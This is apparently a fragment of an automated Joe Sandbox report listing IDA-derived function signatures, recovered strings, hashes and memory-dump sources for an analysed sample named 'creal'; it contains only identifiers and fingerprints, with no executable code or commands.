                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: AND $<expr>$rowid
                                                                                                                                                                                                                • API String ID: 3510742995-4041574714
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                • API String ID: 0-1505470444
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                • API String ID: 3510742995-2410398255
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                • API String ID: 3510742995-2916047017
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2162964266-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: $%!.15g$-
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareObject_Rich
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$ArgsCallDeallocErr_InstanceObject
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 469999563-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_Unicode_
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 3285369508-1523873471
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_Item
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: feed
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: eligible
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: reset
                                                                                                                                                                                                                • API String ID: 1069087923-1352515405
                                                                                                                                                                                                                • Opcode ID: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                • Instruction ID: fb61bb5f43e337544298d8f4eb9d4b05d14d0c1f1b1bf4c8346c22d33c588cd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0F865E0D787C0FB29ABA1E84937C23A1AF49BD4F045031C82D0B3A5EE2CE1848742
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                • Opcode ID: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                • Instruction ID: f781979af693376cb680bd5c5f8a5f8b2ee9ade57636c794bc3e06e779cc0f33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E02224B28B9181EA109B82F4882796320AF08FC8F085130EF0E0BF1EEF2CE442C741
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                • Opcode ID: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                • Instruction ID: 754f83acae9da80d882c35bbc642f5757b94278233d200580d5245a2c686d8df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC91E272B2C75A82E664CF95A44077A76A0FB84BD0F044135EE4D47B89DF3CE5A18B01
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                                • Opcode ID: 0fc1c0f9dbc0d14581934465c76cd318a675b62778fa82b6186cc9449e27d309
                                                                                                                                                                                                                • Instruction ID: c7ef97dd48a71e24f4814927835ee37445ae024a399bed8a65faecf0dc0cada7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc1c0f9dbc0d14581934465c76cd318a675b62778fa82b6186cc9449e27d309
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA91CC72B2CB6A86EA549E96909437A76A0FB44BE0F185239EF5D07BC1DF3CE1508701